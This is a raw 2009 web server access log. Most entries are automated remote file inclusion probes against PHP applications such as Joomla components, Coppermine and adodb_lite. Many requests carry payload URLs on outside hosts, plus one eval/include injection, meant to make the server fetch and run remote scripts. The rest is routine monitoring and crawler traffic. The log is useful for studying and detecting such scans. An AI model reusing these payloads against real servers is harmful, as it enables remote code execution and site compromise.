195.34.78.110 - - [21/Jun/2009:04:24:12 -0400] "GET /logs/access_log.Q109051300%20%20///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:24:54 -0400] "GET /logs/access_log.Q109052200%20%20///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:25:06 -0400] "GET /logs/access_log.Q109051800%20%20/bbs///?_zb_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:25:22 -0400] "GET ///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:25:22 -0400] "GET /logs///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 6382 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:25:22 -0400] "GET /logs/access_log.Q109051300%20%20///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:25:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:04:26:02 -0400] "GET /logs/access_log.Q109052200%20%20///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
86.96.228.93 - - [21/Jun/2009:04:27:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
86.96.228.93 - - [21/Jun/2009:04:27:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
86.96.229.88 - - [21/Jun/2009:04:27:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
124.217.216.86 - - [21/Jun/2009:04:28:32 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:04:28:32 -0400] "GET /logs/access_log.Q109052000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:04:28:32 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:04:28:32 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:29:46 -0400] "GET /logs/access_log.Q109051300%20%20/bbs///?_zb_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:30:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.82.142 - - [21/Jun/2009:04:32:19 -0400] "GET /logs/access_log.Q109052700/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:32:26 -0400] "GET /logs/index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:32:26 -0400] "GET /index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:32:26 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:32:42 -0400] "GET /logs/error_log.Q109052700/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:33:24 -0400] "GET /logs/access_log.Q109061000/index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:34:00 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:34:33 -0400] "GET /logs/access_log.Q109061000%20%20/index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:35:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.48.127.79 - - [21/Jun/2009:04:35:27 -0400] "GET //include/admin.lib.inc.php?site_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:35:27 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:35:27 -0400] "GET /logs/access_log.Q109051100%20%20//include/admin.lib.inc.php?site_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:35:53 -0400] "GET /?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:35:53 -0400] "GET /logs/?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:35:56 -0400] "GET /logs/access_log.Q109051500/?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:04:36:07 -0400] "GET /logs/access_log.Q109050800///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
68.109.233.157 - - [21/Jun/2009:04:36:07 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
211.49.99.7 - - [21/Jun/2009:04:36:07 -0400] "GET /logs/access_log.Q109051600/?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:04:36:07 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 6382 "-" "libwww-perl/5.79"
204.202.23.11 - - [21/Jun/2009:04:36:08 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:04:36:09 -0400] "GET /errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:04:36:09 -0400] "GET /logs/errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:04:36:10 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
83.98.209.71 - - [21/Jun/2009:04:36:25 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:36:26 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:36:26 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:36:26 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
68.109.233.157 - - [21/Jun/2009:04:36:56 -0400] "GET /logs/access_log.Q109051300///?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
200.49.175.157 - - [21/Jun/2009:04:37:21 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:04:37:21 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:04:37:21 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:04:37:36 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:04:37:36 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:04:37:36 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.49.175.157 - - [21/Jun/2009:04:37:36 -0400] "GET /logs/access_log.Q109051200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:37:43 -0400] "GET /logs/access_log.Q109053000///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:37:43 -0400] "GET /logs/access_log.Q109051900///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:38:18 -0400] "GET /logs/access_log.Q109053000///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:38:19 -0400] "GET /logs/access_log.Q109051900///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:38:21 -0400] "GET /logs/access_log.Q109053000%20%20//include/admin.lib.inc.php?site_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:38:34 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:38:34 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:38:34 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:04:38:34 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
204.202.23.11 - - [21/Jun/2009:04:38:36 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:04:38:37 -0400] "GET /errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:04:38:37 -0400] "GET /logs/errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
204.202.23.11 - - [21/Jun/2009:04:38:38 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
200.49.175.157 - - [21/Jun/2009:04:38:39 -0400] "GET /logs/access_log.Q109051200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:04:38:43 -0400] "GET /images/store_handpc_section.jpg HTTP/1.1" 200 23958 "-" "Googlebot-Image/1.0"
84.201.208.50 - - [21/Jun/2009:04:38:44 -0400] "GET /logs//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:38:44 -0400] "GET //index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:38:44 -0400] "GET /logs/access_log.Q109061800//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:38:44 -0400] "GET /logs/access_log.Q109051600//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
193.231.42.152 - - [21/Jun/2009:04:38:47 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
121.78.82.142 - - [21/Jun/2009:04:38:52 -0400] "GET /logs/access_log.Q109061800/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:40:14 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:40:14 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:40:14 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:40:24 -0400] "GET /errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
92.48.127.79 - - [21/Jun/2009:04:40:24 -0400] "GET /logs/errors.php?error=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:40:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.48.127.79 - - [21/Jun/2009:04:40:31 -0400] "GET /logs/access_log.Q109052000/index.php?sayfa=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:41:17 -0400] "GET /logs/access_log.Q109051500%20%20/?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:41:21 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:41:31 -0400] "GET /logs/access_log.Q109061800%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:41:31 -0400] "GET /logs/access_log.Q109051600%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:41:36 -0400] "GET /logs/access_log.Q109061000%20%20//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:42:01 -0400] "GET /logs/access_log.Q109053000/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:42:01 -0400] "GET /logs/access_log.Q109051900/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:42:01 -0400] "GET /logs/access_log.Q109053000/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:42:04 -0400] "GET /logs/access_log.Q109051900/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:42:26 -0400] "GET /logs/access_log.Q109051600%20%20/?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
86.96.228.93 - - [21/Jun/2009:04:43:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SIMBAR={F6C1E7EF-C80D-4A7F-BCFB-87BF42509DA2}; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
217.147.29.190 - - [21/Jun/2009:04:43:15 -0400] "GET /logs//include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:04:43:15 -0400] "GET /logs/access_log.Q109052700%20%20//include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:04:43:16 -0400] "GET //include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:04:44:07 -0400] "GET /images/items/04948401_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
217.147.29.190 - - [21/Jun/2009:04:44:54 -0400] "GET /logs/access_log.Q109052700//include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:45:11 -0400] "GET /logs/access_log.Q109051300//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:45:15 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:45:15 -0400] "GET //include/admin.lib.inc.php?site_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:45:15 -0400] "GET /logs/access_log.Q109051100%20%20//include/admin.lib.inc.php?site_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:45:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [21/Jun/2009:04:46:14 -0400] "GET //index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:04:46:14 -0400] "GET /logs/error_log.Q109051900%20%20//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:04:46:14 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:04:46:33 -0400] "GET /logs/access_log.Q109051900//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:04:46:33 -0400] "GET /logs/error_log.Q109051900//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:46:36 -0400] "GET /logs/access_log.Q109060500//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:04:46:39 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:04:46:39 -0400] "GET //index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:04:46:39 -0400] "GET /logs/error_log.Q109051900%20%20//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:46:59 -0400] "GET //index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:46:59 -0400] "GET /logs//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:47:00 -0400] "GET /logs/access_log.Q109061400//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:04:47:24 -0400] "GET /logs/access_log.Q109051900//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:04:47:26 -0400] "GET /logs/error_log.Q109051900//index.php?DOCUMENT_ROOT=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:47:35 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:47:35 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:47:35 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:47:42 -0400] "GET /logs/access_log.Q109061400//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:04:47:42 -0400] "GET //index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
